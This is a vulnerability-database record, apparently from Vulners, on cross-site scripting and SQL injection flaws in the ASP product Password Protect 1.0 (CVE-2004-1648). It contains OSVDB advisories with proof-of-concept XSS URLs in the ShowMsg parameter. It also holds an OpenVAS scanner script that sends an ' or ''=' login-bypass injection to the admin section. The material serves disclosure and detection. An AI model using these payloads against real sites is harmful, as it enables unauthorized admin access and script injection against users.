ID OSVDB:9373 Type osvdb Reporter Criolabs Staff(security@criolabs.net) Modified 2004-08-30T18:26:26
Description
Vulnerability Description
Password Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate "showmsg" variable upon submission to the "users_list.asp" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
Password Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate "showmsg" variable upon submission to the "users_list.asp" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
{"edition": 1, "title": "Password Protect users_list.asp ShowMsg Variable XSS", "bulletinFamily": "software", "published": "2004-08-30T18:26:26", "lastseen": "2017-04-28T13:20:04", "modified": "2004-08-30T18:26:26", "reporter": "Criolabs Staff(security@criolabs.net)", "viewCount": 26, "href": "https://vulners.com/osvdb/OSVDB:9373", "description": "## Vulnerability Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate \"showmsg\" variable upon submission to the \"users_list.asp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate \"showmsg\" variable upon submission to the \"users_list.asp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/adminSection/users_list.asp?showmsg=<script>alert('xss')</script>\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1648](https://vulners.com/cve/CVE-2004-1648)\n", "affectedSoftware": [{"name": "Password Protect", "version": "1.0", "operator": "eq"}], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2017-04-28T13:20:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-1648"]}, {"type": "osvdb", "idList": ["OSVDB:9369", "OSVDB:9371", "OSVDB:9374"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231014587"]}], "modified": "2017-04-28T13:20:04", "rev": 2}, "vulnersScore": 5.1}, "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "cvelist": ["CVE-2004-1648"], "id": "OSVDB:9373"}
{"cve": [{"lastseen": "2021-02-02T05:23:00", "description": "Cross-site scripting (XSS) vulnerability in (1) index.asp, (2) ChangePassword.asp, (3) users_list.asp, (4) and users_add.asp in Password Protect allows remote attackers to inject arbitrary web script or HTML via the ShowMsg parameter.", "edition": 4, "cvss3": {}, "published": "2004-08-31T04:00:00", "title": "CVE-2004-1648", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1648"], "modified": "2017-07-11T01:31:00", "cpe": ["cpe:/a:web_animations:password_protect:*"], "id": "CVE-2004-1648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1648", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:web_animations:password_protect:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-1648"], "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate \"ShowMsg\" variable upon submission to the \"index.asp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate \"ShowMsg\" variable upon submission to the \"index.asp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/adminSection/index.asp?ShowMsg=<script>alert('xss')</script>\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1648](https://vulners.com/cve/CVE-2004-1648)\n", "modified": "2004-08-30T18:26:26", "published": "2004-08-30T18:26:26", "href": "https://vulners.com/osvdb/OSVDB:9371", "id": "OSVDB:9371", "title": "Password Protect index.asp ShowMsg Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-1648"], "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the \"ShowMsg\" variable upon submission to the \"users_add.asp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the \"ShowMsg\" variable upon submission to the \"users_add.asp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/adminSection/users_add.asp?showmsg=<script>alert('xss')</script>\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9369](https://vulners.com/osvdb/OSVDB:9369)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1648](https://vulners.com/cve/CVE-2004-1648)\n", "modified": "2004-08-30T18:26:26", "published": "2004-08-30T18:26:26", "id": "OSVDB:9374", "href": "https://vulners.com/osvdb/OSVDB:9374", "title": "Password Protect users_add.asp ShowMsg Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-1648"], "edition": 1, "description": "## Vulnerability Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'ShowMsg' variables upon submission to the 'ChangePassword.asp' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPassword Protect contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'ShowMsg' variables upon submission to the 'ChangePassword.asp' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\n/adminSection/ChangePassword.asp?ShowMsg=[evil_code]\n## References:\nVendor URL: http://www.webanimations.com.au/\nVendor URL: http://www.webanimations.com.au/shop/Scripts/prodView.asp?idproduct=16\nSecurity Tracker: 1011093\n[Secunia Advisory ID:12407](https://secuniaresearch.flexerasoftware.com/advisories/12407/)\n[Related OSVDB ID: 9371](https://vulners.com/osvdb/OSVDB:9371)\n[Related OSVDB ID: 9373](https://vulners.com/osvdb/OSVDB:9373)\n[Related OSVDB ID: 9374](https://vulners.com/osvdb/OSVDB:9374)\n[Related OSVDB ID: 9375](https://vulners.com/osvdb/OSVDB:9375)\n[Related OSVDB ID: 9370](https://vulners.com/osvdb/OSVDB:9370)\n[Related OSVDB ID: 9372](https://vulners.com/osvdb/OSVDB:9372)\n[Related OSVDB ID: 9376](https://vulners.com/osvdb/OSVDB:9376)\n[Related OSVDB ID: 9377](https://vulners.com/osvdb/OSVDB:9377)\nOther Advisory URL: http://www.criolabs.net/advisories/passprotect.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0017.html\n[CVE-2004-1648](https://vulners.com/cve/CVE-2004-1648)\n", "modified": "2004-08-30T18:26:26", "published": "2004-08-30T18:26:26", "href": "https://vulners.com/osvdb/OSVDB:9369", "id": "OSVDB:9369", "title": "Password Protect ChangePassword.asp ShowMsg Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2020-05-08T16:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1647", "CVE-2004-1648"], "description": "Password Protect is a password protected script allowing you to manage a\n remote site through an ASP based interface.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231014587", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014587", "type": "openvas", "title": "Password Protect SQL Injection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Password Protect SQL Injection\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2004 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# Contact: Criolabs <security@criolabs.net>\n# Subject: Password Protect XSS and SQL-Injection vulnerabilities.\n# Date: 31.8.2004 02:17\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14587\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-1647\", \"CVE-2004-1648\");\n script_bugtraq_id(11073);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Password Protect SQL Injection\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2004 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version of this software.\");\n\n script_tag(name:\"summary\", value:\"Password Protect is a password protected script allowing you to manage a\n remote site through an ASP based interface.\");\n\n script_tag(name:\"impact\", value:\"An SQL Injection vulnerability in the product allows remote attackers to\n inject arbitrary SQL statements into the remote database and to gain\n administrative access on this service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_asp( port:port ) )\n exit( 0 );\n\nhost = http_host_name( port:port );\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = dir + \"/adminSection/main.asp\";\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n\n v = eregmatch( pattern: \"Set-Cookie: *([^; \\t\\r\\n]+)\", string:res );\n if( isnull( v ) ) continue; # Cookie is not available\n cookie = v[1];\n\n useragent = http_get_user_agent();\n req = string( \"POST /\", dir, \"/adminSection/index_next.asp HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Accept: */*\\r\\n\",\n \"Connection: close\\r\\n\",\n \"Cookie: \", cookie, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: 57\\r\\n\",\n \"\\r\\n\",\n \"admin=%27+or+%27%27%3D%27&Pass=password&BTNSUBMIT=+Login+\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req );\n\n req = string( \"GET /\", dir, \"/adminSection/main.asp HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Accept: */*\\r\\n\",\n \"Connection: close\\r\\n\",\n \"Cookie: \", cookie, \"\\r\\n\",\n \"\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"Web Site Administration\" >< res && \"The Web Animations Administration Section\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
